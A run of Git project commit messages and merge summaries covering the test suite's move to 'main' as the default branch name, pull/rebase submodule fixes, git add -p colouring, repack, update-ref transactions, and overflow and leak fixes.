Carefully excluding t3404, which sees independent development elsewhere
at the time of writing, we use `main` as the default branch name in
t34*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t34*.sh &&
git checkout HEAD -- t34\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are about to adjust t3416 for the new default branch name `main`.
This name is two characters shorter and therefore needs two spaces more
padding to align correctly.
Adjusting the alignment before the big search-and-replace makes it
easier to verify that the final result does not leave any misaligned
lines behind.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t3040, which sees independent development elsewhere
at the time of writing, we transition above-mentioned tests to the
default branch name `main`. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t3[0-3]*.sh t3206/* &&
git checkout HEAD -- t3040\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t2106, which sees independent development elsewhere
at the time of writing, we transition above-mentioned tests to the
default branch name `main`. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t2*.sh &&
git checkout HEAD -- t2106\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t1309, which sees independent development elsewhere
at the time of writing, we transition above-mentioned tests to the
default branch name `main`. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -e 's/naster/nain/g' -- t[01]*.sh &&
git checkout HEAD -- t1309\*)
Note that t5533 contains a variation of the name `master` (`naster`)
that we rename here, too.
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Helped-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are about to adjust t0060 for the new default branch name `main`.
This name is two characters shorter and therefore needs two spaces more
padding to align correctly.
Adjusting the alignment before the big search-and-replace makes it
easier to verify that the final result does not leave any misaligned
lines behind.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In addition to the manual adjustment to let the `linux-gcc` CI job run
the test suite with `master` and then with `main`, this patch makes sure
that GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME is set in all test scripts
that currently rely on the initial branch name being `master by default.
To determine which test scripts to mark up, the first step was to
force-set the default branch name to `master` in
- all test scripts that contain the keyword `master`,
- t4211, which expects `t/t4211/history.export` with a hard-coded ref to
initialize the default branch,
- t5560 because it sources `t/t556x_common` which uses `master`,
- t8002 and t8012 because both source `t/annotate-tests.sh` which also
uses `master`)
This trick was performed by this command:
$ sed -i '/^ *\. \.\/\(test-lib\|lib-\(bash\|cvs\|git-svn\)\|gitweb-lib\)\.sh$/i\
GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=master\
export GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME\
' $(git grep -l master t/t[0-9]*.sh) \
t/t4211*.sh t/t5560*.sh t/t8002*.sh t/t8012*.sh
After that, careful, manual inspection revealed that some of the test
scripts containing the needle `master` do not actually rely on a
specific default branch name: either they mention `master` only in a
comment, or they initialize that branch specificially, or they do not
actually refer to the current default branch. Therefore, the
aforementioned modification was undone in those test scripts thusly:
$ git checkout HEAD -- \
t/t0027-auto-crlf.sh t/t0060-path-utils.sh \
t/t1011-read-tree-sparse-checkout.sh \
t/t1305-config-include.sh t/t1309-early-config.sh \
t/t1402-check-ref-format.sh t/t1450-fsck.sh \
t/t2024-checkout-dwim.sh \
t/t2106-update-index-assume-unchanged.sh \
t/t3040-subprojects-basic.sh t/t3301-notes.sh \
t/t3308-notes-merge.sh t/t3423-rebase-reword.sh \
t/t3436-rebase-more-options.sh \
t/t4015-diff-whitespace.sh t/t4257-am-interactive.sh \
t/t5323-pack-redundant.sh t/t5401-update-hooks.sh \
t/t5511-refspec.sh t/t5526-fetch-submodules.sh \
t/t5529-push-errors.sh t/t5530-upload-pack-error.sh \
t/t5548-push-porcelain.sh \
t/t5552-skipping-fetch-negotiator.sh \
t/t5572-pull-submodule.sh t/t5608-clone-2gb.sh \
t/t5614-clone-submodules-shallow.sh \
t/t7508-status.sh t/t7606-merge-custom.sh \
t/t9302-fast-import-unpack-limit.sh
We excluded one set of test scripts in these commands, though: the range
of `git p4` tests. The reason? `git p4` stores the (foreign) remote
branch in the branch called `p4/master`, which is obviously not the
default branch. Manual analysis revealed that only five of these tests
actually require a specific default branch name to pass; They were
modified thusly:
$ sed -i '/^ *\. \.\/lib-git-p4\.sh$/i\
GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=master\
export GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME\
' t/t980[0167]*.sh t/t9811*.sh
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In d18c950a69 (pull: warn if the user didn't say whether to rebase or
to merge, 2020-03-09), a new hint was introduced to encourage users to
make a conscious decision about whether they want their pull to merge or
to rebase by configuring the `pull.rebase` setting.
This warning was clearly intended to advise users, but as pointed out in
https://lore.kernel.org/git/87ima2rdsm.fsf%40evledraar.gmail.com, it
uses `warning()` instead of `advise()`.
One consequence is that the advice is not colorized in the same manner
as other, similar messages. So let's use `advise()` instead.
Pointed-out-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We do not need to hard-code the actual branch name, as we can use the
`test_commit` function to simplify the code and use the tag it
generates, thereby being a lot more precise in what we want.
Strangely enough, this test case would have succeeded even with an
overridden default branch name, obviously for the wrong reason. Let's
verify that it passes for the expected reason, by looking for a
tell-tale in Git's output.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The `onbranch` test cases touched by this patch do not actually try to
include any other config. Their purpose is to avoid regressing on two
bugs in the `include.onbranch:<name>.path` code that we fixed in the
past, bugs that are actually unrelated to any concrete branch name.
The first bug was fixed in 85fe0e800c (config: work around bug with
includeif:onbranch and early config, 2019-07-31). Essentially, when
reading early config, there would be a catch-22 trying to access the
refs, and therefore we simply cannot evaluate the condition at that
point. The test case ensures that we avoid emitting this bogus message:
BUG: refs.c:1851: attempting to get main_ref_store outside of repository
The second test case concerns the non-Git scenario, where we simply do
not have a current branch to begin with (because we don't have a
repository in the first place), and the test case was introduced in
22932d9169 (config: stop checking whether the_repository is NULL,
2019-08-06) to ensure that we don't cause a segmentation fault should
the code still incorrectly try to look at any ref.
In short, neither of these two test cases will ever look at a current
branch name, even in case of regressions. Therefore, the actual branch
name does not matter at all. We can therefore easily avoid
racially-charged branch names here, and that's what this patch does.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
compare_tasks_by_selection() is used with QSORT and gets passed pointers
to the elements of "static struct maintenance_task tasks[]". It casts
the *addresses* of these passed pointers to element pointers, though,
and thus effectively compares some unrelated values from the stack. Fix
the casts to actually compare array elements.
Detected by USan (make SANITIZE=undefined test).
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git blame --ignore-revs-file=<file>" learned to ignore a
non-existent object name in the input, instead of complaining.
* jc/blame-ignore-fix:
blame: silently ignore invalid ignore file objects
"make DEVELOPER=1 sparse" used to run sparse and let it emit
warnings; now such warnings will cause an error.
* jc/sparse-error-for-developer-build:
Makefile: enable -Wsparse-error for DEVELOPER build
"git blame -L :funcname -- path" did not work well for a path for
which a userdiff driver is defined.
* pb/blame-funcname-range-userdiff:
blame: simplify 'setup_blame_bloom_data' interface
blame: simplify 'setup_scoreboard' interface
blame: enable funcname blaming with userdiff driver
line-log: mention both modes in 'blame' and 'log' short help
doc: add more pointers to gitattributes(5) for userdiff
blame-options.txt: also mention 'funcname' in '-L' description
doc: line-range: improve formatting
doc: log, gitk: move '-L' description to 'line-range-options.txt'
Preparation for a new merge strategy.
* en/merge-ort-api-null-impl:
merge,rebase,revert: select ort or recursive by config or environment
fast-rebase: demonstrate merge-ort's API via new test-tool command
merge-ort-wrappers: new convience wrappers to mimic the old merge API
merge-ort: barebones API of new merge strategy with empty implementation
Parts of "git maintenance" to ease writing crontab entries (and
other scheduling system configuration) for it.
* ds/maintenance-part-3:
maintenance: add troubleshooting guide to docs
maintenance: use 'incremental' strategy by default
maintenance: create maintenance.strategy config
maintenance: add start/stop subcommands
maintenance: add [un]register subcommands
for-each-repo: run subcommands on configured repos
maintenance: add --schedule option and config
maintenance: optionally skip --auto process
"git rebase -i" did not store ORIG_HEAD correctly.
* pw/rebase-i-orig-head:
rebase -i: simplify get_revision_ranges()
rebase -i: use struct object_id when writing state
rebase -i: use struct object_id rather than looking up commit
rebase -i: stop overwriting ORIG_HEAD buffer
"git format-patch --output=there" did not work as expected and
instead crashed. The option is now supported.
* jk/format-patch-output:
format-patch: support --output option
format-patch: tie file-opening logic to output_directory
format-patch: refactor output selection
"git log -L<range>:<path>" is documented to take no pathspec, but
this was not enforced by the command line option parser, which has
been corrected.
* jc/line-log-takes-no-pathspec:
log: diagnose -L used with pathspec as an error
The code to see if "git stash drop" can safely remove refs/stash
has been made more carerful.
* rs/empty-reflog-check-fix:
stash: simplify reflog emptiness check
Add t/perf support for fsmonitor.
* nk/perf-fsmonitor:
t/perf/fsmonitor: add benchmark for dirty status
t/perf/fsmonitor: perf comparison of multiple fsmonitor integrations
t/perf/fsmonitor: initialize test with git reset
t/perf/fsmonitor: factor setup for fsmonitor into function
t/perf/fsmonitor: silence initial git commit
t/perf/fsmonitor: shorten DESC to basename
t/perf/fsmonitor: factor description out for readability
t/perf/fsmonitor: improve error message if typoing hook name
t/perf/fsmonitor: move watchman setup to one-time-repo-setup
t/perf/fsmonitor: separate one time repo initialization
Preparation for a new merge strategy.
* en/merge-tests:
t6423: add more details about direct resolution of directories
t6423: note improved ort handling with untracked files
t6423, t6436: note improved ort handling with dirty files
merge tests: expect slight differences in output for recursive vs. ort
t6423: expect improved conflict markers labels in the ort backend
t6404, t6423: expect improved rename/delete handling in ort backend
t6416: correct expectation for rename/rename(1to2) + directory/file
merge tests: expect improved directory/file conflict handling in ort
t/: new helper for tests that pass with ort but fail with recursive
Prepare a test script to transition of the default branch name to
'main'.
* js/default-branch-name-adjust-t5515:
t5515: use `main` as the name of the main branch for testing (conclusion)
t5515: use `main` as the name of the main branch for testing (part 3)
t5515: use `main` as the name of the main branch for testing (part 2)
t5515: use `main` as the name of the main branch for testing (part 1)
"git fetch --depth=<n>" over the stateless RPC / smart HTTP
transport handled EOF from the client poorly at the server end.
* dd/upload-pack-stateless-eof:
upload-pack: allow stateless client EOF just prior to haves
This comment was most likely a "note to self" during the development of
1c3e5c4ebc (Tests for core subproject support, 2007-04-19) and is
neither needed nor comprehensible at this point. Let's remove it.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'test_set_prereq's description claims that prereqs can be specified to
'test_expect_code', but that is not the case (it is not meant to run a
test _case_, but a git command), so remove it.
OTOH that description doesn't mention 'test_external' and
'test_external_without_stderr' that do accept prereqs, so mention
them.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some test prereqs depend on other prereqs, so in a couple of cases we
have nested prereqs that look something like this:
test_lazy_prereq FOO '
test_have_prereq BAR &&
check-foo
'
This can be problematic, because lazy prereqs are evaluated in the
'$TRASH_DIRECTORY/prereq-test-dir' directory, which is the same for
every prereq, and which is automatically removed after the prereq has
been evaluated. So if the inner prereq (BAR above) is a lazy prereq
that hasn't been evaluated yet, then after its evaluation the
'prereq-test-dir' shared with the outer prereq will be removed.
Consequently, 'check-foo' will find itself in a non-existing
directory, and won't be able to create/access any files in its cwd,
which could result in an unfulfilled outer prereq.
Luckily, this doesn't affect any of our current nested prereqs, either
because the inner prereq is not a lazy prereq (e.g. MINGW, CYGWIN or
PERL), or because the outer prereq happens to be checked without
touching any paths in its cwd (GPGSM and RFC1991 in 'lib-gpg.sh').
So to prevent nested prereqs from interfering with each other let's
evaluate each prereq in its own dedicated directory by appending the
prereq's name to the directory name, e.g. 'prereq-test-dir-SYMLINKS'.
In the test we check not only that the prereq test dir is still there,
but also that the inner prereq can't mess with the outer prereq's
files.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
During the transition of the test suite to a new default branch name, it
was noticed that this test case succeeded for the wrong reason when the
default branch name was overridden.
While we fixed that in the previous commit, let's make sure that we look
for a tell-tale in the error message that the `git checkout` failed for
the reason we wanted it to fail.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We do have this wonderful shortcut `git checkout -` to go back to the
previous branch, thanks to the reflog.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We settled on the style where the test cases' code starts by the opening
single quote being on the `test_expect_*` line, and the closing quote
being in its own line after the code.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When 'git repack' creates a pack with the same name as any existing
pack, it moves the existing one to 'old-pack-xxx.{pack,idx,...}' and
then renames the new one into place.
Eventually, it would be nice to have 'git repack' allow for writing a
multi-pack index at the critical time (after the new packs have been
written / moved into place, but before the old ones have been deleted).
Guessing that this option might be called '--write-midx', this makes the
following situation (where repacks are issued back-to-back without any
new objects) impossible:
$ git repack -adb
$ git repack -adb --write-midx
In the second repack, the existing packs are overwritten verbatim with
the same rename-to-old sequence. At that point, the current MIDX is
invalidated, since it refers to now-missing packs. So that code wants to
be run after the MIDX is re-written. But (prior to this patch) the new
MIDX can't be written until the new packs are moved into place. So, we
have a circular dependency.
This is all hypothetical, since no code currently exists to write a MIDX
safely during a 'git repack' (the 'GIT_TEST_MULTI_PACK_INDEX' does so
unsafely). Putting hypothetical aside, though: why do we need to rename
existing packs to be prefixed with 'old-' anyway?
This behavior dates all the way back to 2ad47d6 (git-repack: Be
careful when updating the same pack as an existing one., 2006-06-25).
2ad47d6 is mainly concerned about a case where a newly written pack
would have a different structure than its index. This used to be
possible when the pack name was a hash of the set of objects. Under this
naming scheme, two packs that store the same set of objects could differ
in delta selection, object positioning, or both. If this happened, then
any such packs would be unreadable in the instant between copying the
new pack and new index (i.e., either the index or pack will be stale
depending on the order that they were copied).
But since 1190a1a (pack-objects: name pack files after trailer hash,
2013-12-05), this is no longer possible, since pack files are named not
after their logical contents (i.e., the set of objects), but by the
actual checksum of their contents. So, this old- behavior can safely go,
which allows us to avoid our circular dependency above.
In addition to avoiding the circular dependency, this patch also makes
'git repack' a lot simpler, since we don't have to deal with failures
encountered when renaming existing packs to be prefixed with 'old-'.
This patch is mostly limited to removing code paths that deal with the
'old' prefixing, with the exception of files that include the pack's
name in their own filename, like .idx, .bitmap, and related files. The
exception is that we want to continue to trust what pack-objects wrote.
That is, it is not the case that we pretend as if pack-objects didn't
write files identical to ones that already exist, but rather that we
respect what pack-objects wrote as the source of truth. That cuts two
ways:
- If pack-objects produced an identical pack to one that already
exists with a bitmap, but did not produce a bitmap, we remove the
bitmap that already exists. (This behavior is codified in t7700.14).
- If pack-objects produced an identical pack to one that already
exists, we trust the just-written version of the coresponding .idx,
.promisor, and other files over the ones that already exist. This
ensures that we use the most up-to-date versions of this files,
which is safe even in the face of format changes in, say, the .idx
file (which would not be reflected in the .idx file's name).
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Imitating cac42e47 (ci: avoid using the deprecated `set-env`
construct, 2020-11-07), avoid deprecated ::set-env and use the
recommended alternative instead in print-test-failures.sh
Helped-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is possible for the name of an alias to end with the name of another
alias, in which case the code will incorrectly detect a loop.
We can fix that by adding an extra space between words.
Suggested-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Ever since 'git pull' learned '--recurse-submodules' in a6d7eb2c7a
(pull: optionally rebase submodules (remote submodule changes only),
2017-06-23), we check if there are local submodule modifications by
checking the revision range 'curr_head --not rebase_fork_point'.
The goal of this check is to abort the pull if there are submodule
modifications in the local commits being rebased, since this scenario is
not supported.
However, the actual range of commits being rebased is not
'rebase_fork_point..curr_head', as the logic in
'get_rebase_newbase_and_upstream' reveals, it is 'upstream..curr_head'.
If the 'git merge-base --fork-point' invocation in
'get_rebase_fork_point' fails to find a fork point between the current
branch and the remote-tracking branch we are pulling from,
'rebase_fork_point' is null and since 4d36f88be7 (submodule: do not pass
null OID to setup_revisions, 2018-05-24), 'submodule_touches_in_range'
checks 'curr_head' and all its ancestors for submodule modifications.
Since it is highly likely that there are submodule modifications in this
range (which is in effect the whole history of the current branch), this
prevents 'git pull --rebase --recurse-submodules' from succeeding if no
fork point exists between the current branch and the remote-tracking
branch being pulled. This can happen, for example, when the current
branch was forked from a commit which was never recorded in the reflog
of the remote-tracking branch we are pulling, as the last two paragraphs
of the "Discussion on fork-point mode" section in git-merge-base(1)
explain.
Fix this bug by passing 'upstream' instead of 'rebase_fork_point' as the
'excl_oid' argument to 'submodule_touches_in_range'.
Reported-by: Brice Goglin <bgoglin@free.fr>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It can be hard at first glance to distinguish what is different between
the two tests 'recursive rebasing pull' and 'pull rebase recursing fails
with conflicts' in 't5572-pull-submodule.sh', and to understand how they
relate to the scenarios described in a6d7eb2c7a (pull: optionally rebase
submodules (remote submodule changes only), 2017-06-23), which
implemented '--recurse-submodules' for 'git pull' and added these tests.
Rename the tests to be more descriptive and add some bullet points
comments describing the different scenarios.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Test 5572.63 ("branch has no merge base with remote-tracking
counterpart") was introduced in 4d36f88be7 (submodule: do not pass null
OID to setup_revisions, 2018-05-24), as a regression test for the bug
this commit was fixing (preventing a 'fatal: bad object' error when the
current branch and the remote-tracking branch we are pulling have no
merge-base).
However, the commit message for 4d36f88be7 does not describe in which
real-life situation this bug was encountered. The brief discussion on the
mailing list [1] does not either.
The regression test is not really representative of a real-life
scenario: both the local repository and its upstream have only a single
commit, and the "no merge-base" scenario is simulated by recreating this
root commit in the local repository using 'git commit-tree' before
calling 'git pull --rebase --recurse-submodules'. The rebase succeeds
and results in the local branch being reset to the same root commit as
the upstream branch.
The fix in 4d36f88be7 modifies 'submodule.c::submodule_touches_in_range'
so that if 'excl_oid' is null, which is the case when the 'git merge-base
--fork-point' invocation in 'builtin/pull.c::get_rebase_fork_point'
errors (no fork-point), then instead of 'incl_oid --not excl_oid' being
passed to setup_revisions, only 'incl_oid' is passed, and
'submodule_touches_in_range' examines 'incl_oid' and all its ancestors
to verify that they do not touch the submodule.
In test 5572.63, the recreated lone root commit in the local repository is
thus the only commit being examined by 'submodule_touches_in_range', and
this commit *adds* the submodule. However, 'submodule_touches_in_range'
*succeeds* because 'combine-diff.c::diff_tree_combined' (see the
backtrace below) returns early since this commit is the root commit
and has no parents.
#0 diff_tree_combined at combine-diff.c:1494
#1 0x0000000100150cbe in diff_tree_combined_merge at combine-diff.c:1649
#2 0x00000001002c7147 in collect_changed_submodules at submodule.c:869
#3 0x00000001002c7d6f in submodule_touches_in_range at submodule.c:1268
#4 0x00000001000ad58b in cmd_pull at builtin/pull.c:1040
In light of all this, add a note in t5572 documenting this peculiar
test.
[1] https://lore.kernel.org/git/20180524204729.19896-1-jonathantanmy@google.com/t/#u
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The function 'run_rebase' is responsible for constructing the
command line to be passed to 'git rebase'. This includes both forwarding
pass-through options given to 'git pull' as well computing the <newbase>
and <upstream> arguments to 'git rebase'.
A following commit will need to access the <upstream> argument in
'cmd_pull' to fix a bug with 'git pull --rebase --recurse-submodules'.
In order to do so, refactor the code so that the <newbase> and
<upstream> commits are computed in a new, separate function,
'get_rebase_newbase_and_upstream'.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that the Perl version produces the same output as the built-in
version (mostly fixing bugs in the latter), let's add a regression test
to verify that it stays this way.
Note that we only `grep` for the colored error message instead of
verifying that the entire `stderr` consists of just this one line: when
running the test script using the `-x` option to trace the
commands, the sub-shell in `force_color` causes those commands to be
traced into `err.raw` (unless running in Bash where we set the
`BASH_XTRACEFD` variable to avoid that).
Also note that the color reset in the `<BLUE>+<RESET><BLUE>new<RESET>`
line might look funny and unnecessary, as the corresponding `old` line
does not reset the color after the diff marker only to turn the color
back on right away.
However, this is a (necessary) side effect of the white-space check: in
`emit_line_ws_markup()`, we first emit the diff marker via
`emit_line_0()` and then the rest of the line via `ws_check_emit()`. To
leave them somewhat decoupled, the color has to be reset after the diff
marker to allow for the rest of the line to start with another color (or
inverted, in case of white-space issues).
Finally, we have to simulate hunk editing: the `git add -p` command
cannot rely on the internal diff machinery for coloring after letting
the user edit a hunk; It has to "re-color" the edited hunk. This is the
primary reason why that command is interested in the exact values of the
`color.diff.*` settings in the first place. To test this re-coloring, we
therefore have to pretend to edit a hunk and then show that hunk in the
regression test.
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Git's diff machinery allows users to override the colors to use in
diffs, even the plain-colored context lines. As of 8dbf3eb685 (diff.h:
rename DIFF_PLAIN color slot to DIFF_CONTEXT, 2015-05-27), the preferred
name of the config setting is `color.diff.context`, although Git still
allows `color.diff.plain`.
In the context of `git add -p`, this logic is a bit hard to replicate:
`git_diff_basic_config()` reads all config values sequentially and if it
sees _any_ `color.diff.context` or `color.diff.plain`, it accepts the
new color. The Perl version of `git add -p` needs to go through `git
config --get-color`, though, which allows only one key to be specified.
The same goes for the built-in version of `git add -p`, which has to go
through `repo_config_get_value()`.
The best we can do here is to look for `.context` and if none is found,
fall back to looking for `.plain`, and if still not found, fall back to
the hard-coded default (which in this case is simply the empty string,
as context lines are typically rendered without colored).
This still leads to inconsistencies when both config names are used: the
initial diff will be colored by the diff machinery. Once edited by a
user, a hunk has to be re-colored by `git add -p`, though, which would
then use the other setting to color the context lines.
In practice, this is not _all_ that bad. The `git config` manual says
this in the `color.diff.<slot>`:
`context` (context text - `plain` is a historical synonym)
We should therefore assume that users use either one or the other, but
not both names. Besides, it is relatively uncommon to look at a hunk
after editing it because it is immediately staged by default.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Both versions of `add -i` indent non-flat lists by five spaces. However
when using color the C version prints these spaces after the ANSI color
codes whereas the Perl version prints them before the color codes.
Change the Perl version to match the C version to allow for introducing
a test that verifies that both versions produce the exact same output.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When copying the spaces used to indent non-flat lists in `git add -i`,
one space was appended by mistake. This makes the output of the built-in
version of `git add -i` inconsistent with the Perl version. Let's adjust
the built-in version to produce the same output as the Perl version.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The Perl version of this command colors the progress indicator and the
prompt message in one go.
Let's do the same in the built-in version so that the same upcoming test
(which will compare the output of `git add -p` against a known-good
version) will pass both for the Perl version as well as for the built-in
version.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the subsequent commit, it will become useful to keep track of which
metadata files were written by pack-objects. We already do this to an
extent with the 'exts' array, which only is used in the context of
existing packs.
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix the function name we give in the BUG message. It's "config", not
"choice".
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
parse_treeish_arg() uses dwim_ref() to set refname to a strdup'd string.
Release it after use. Also remove the const qualifier from the refname
member to signify that ownership of the string is handed to the struct,
leaving cleanup duty with the caller of parse_treeish_arg(), thus
avoiding a cast.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
do_diff_cache() builds a struct rev_info to hand to diff_cache() from
scratch by initializing it using repo_init_revisions() and then
replacing its diffopt and prune_data members.
The diffopt member is initialized to a heap-allocated list of options,
though. Release it using diff_setup_done() before overwriting it.
The initial value of the prune_data member doesn't need to be released,
but the copy created using copy_pathspec() does. Clear it after use.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is currently possible to write multiple "start" commands into
git-update-ref(1) for a single session, but none of them except for the
first one actually have any effect.
Using such nested "start"s may eventually have a sensible effect. One
may imagine that it restarts the current transaction, effectively
emptying it and creating a new one. It may also allow for creation of
nested transactions. But currently, none of these are implemented.
Silently ignoring this misuse is making it hard to iterate in the future
if "start" is ever going to have meaningful semantics in such a context.
This commit thus makes sure to error out in case we see such use.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Reviewed-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In commit 0a0fbbe3ff (refs: remove lookup cache for
reference-transaction hook, 2020-08-25), a new benchmark was added to
p1400 which has the intention to exercise creation of multiple
transactions in a single process. As git-update-ref wasn't yet able to
create multiple transactions with a single run we instead used git-push.
As its non-atomic version creates a transaction per reference update,
this was the best approximation we could make at that point in time.
Now that `git-update-ref --stdin` supports creation of multiple
transactions, let's convert the benchmark to use that instead. It has
less overhead and it's also a lot clearer what the actual intention is.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Reviewed-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While git-update-ref has recently grown commands which allow interactive
control of transactions in e48cf33b61 (update-ref: implement interactive
transaction handling, 2020-04-02), it is not yet possible to create
multiple transactions in a single session. To do so, one currently still
needs to invoke the executable multiple times.
This commit addresses this shortcoming by allowing the "start" command
to create a new transaction if the current transaction has already been
either committed or aborted.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Reviewed-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The testcase t1400 exercises the git-update-ref(1) utility. To do so,
many tests directly read and write references via the filesystem,
assuming that we always use loose and/or packed references. While this
is true now, it'll change with the introduction of the reftable backend.
Convert those tests to use git-update-ref(1) and git-show-ref(1) where
possible. Furthermore, two tests are converted to not delete HEAD
anymore, as this results in a broken repository. They've instead been
updated to create a non-mandatory symbolic reference and delete that
one instead.
Some tests remain which exercise behaviour with broken references, which
cannot currently be converted to use regular git tooling.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Reviewed-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In load_idx(), we check that the .idx file is sized appropriately for
the number of objects it claims to have. We recently fixed the case
where the number of objects caused our expected size to overflow a
32-bit unsigned int, and we switched to size_t.
On a 64-bit system, this is fine; our size_t covers any expected size.
On a 32-bit system, though, it won't. The file may claim to have 2^31
objects, which will overflow even a size_t.
This doesn't hurt us at all for a well-formed idx file. A 32-bit system
would already have failed to mmap such a file, since it would be too
big. But an .idx file which _claims_ to have 2^31 objects but is
actually much smaller would fool our check.
This is a broken file, and for the most part we don't care that much
what happens. But:
- it's a little friendlier to notice up front "woah, this file is
broken" than it is to get nonsense results
- later access of the data assumes that the loading function
sanity-checked that we have at least enough bytes for the regular
object-id table. A malformed .idx file could lead to an
out-of-bounds read.
So let's use our overflow-checking functions to make sure that we're not
fooled by a malformed file.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The block-sha1 implementation takes an "unsigned long" for the length of
a buffer to hash, but our hash algorithm wrappers take a size_t, as do
other implementations we support like openssl or sha1dc. On many
systems, including Linux, these two are equivalent, but they are not on
Windows (where only a "long long" is 64 bits). As a result, passing
large chunks to a single the_hash_algo->update_fn() would produce wrong
answers there.
Note that we don't need to update any other sizes outside of the
function interface. We store the cumulative size in a "long long" (which
we must do since we hash things bigger than 4GB, like packfiles, even on
32-bit platforms). And internally, we break that size_t len down into
64-byte blocks to feed into the guts of the algorithm.
